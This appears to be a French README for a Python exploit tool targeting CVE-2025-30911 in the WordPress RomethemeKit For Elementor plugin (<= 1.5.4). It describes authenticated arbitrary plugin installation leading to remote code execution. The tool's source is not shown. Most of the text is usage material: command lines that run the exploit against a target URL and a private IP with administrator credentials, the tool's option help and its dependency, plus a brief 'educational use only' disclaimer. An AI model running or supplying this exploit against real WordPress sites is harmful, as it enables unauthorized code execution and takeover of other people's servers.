
WordPress RomethemeKit For Elementor Plugin <= 1.5.4 est vulnérable à l'exécution de code à distance (RCE)
Ce script exploite une vulnérabilité critique dans le plugin RomethemeKit For Elementor pour WordPress (<= v1.5.4) qui permet l'installation et l'activation arbitraires de plugins authentifiés, pouvant mener à l'exécution de code à distance (RCE).
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:HLa vulnérabilité permet à un attaquant authentifié (avec accès Administrateur) d'installer et d'activer par programmation n'importe quel plugin — y compris des plugins potentiellement malveillants — ce qui peut conduire à une exécution complète de code sur le serveur.
python3 CVE-2025-30911.py -u http://target/wordpress -un admin -p password -pl hello-dolly/hello.php
usage:
CVE-2025-30911.py [-h] -u URL -un USERNAME -p PASSWORD [-pl PLUGIN]
Exploit pour CVE-2025-30911 | Par Nxploited Khaled Alenazi
options:
-h, --help Affiche ce message d'aide et quitte
-u, --url URL URL de base du site WordPress
-un, --username USERNAME Nom d'utilisateur administrateur WordPress
-p, --password PASSWORD Mot de passe administrateur WordPress
-pl, --plugin PLUGIN Plugin à installer (par défaut : hello-dolly/hello.php)
python3 CVE-2025-30911.py -u http://192.168.100.74:888/wordpress -un admin -p admin -pl hello-dolly/hello.php
requests (installer via pip install requests)Cet outil est fourni à des fins éducatives et de test de sécurité autorisé uniquement. Toute utilisation non autorisée est illégale et contraire à l'éthique.
Par : Nxploited | Khaled Alenazi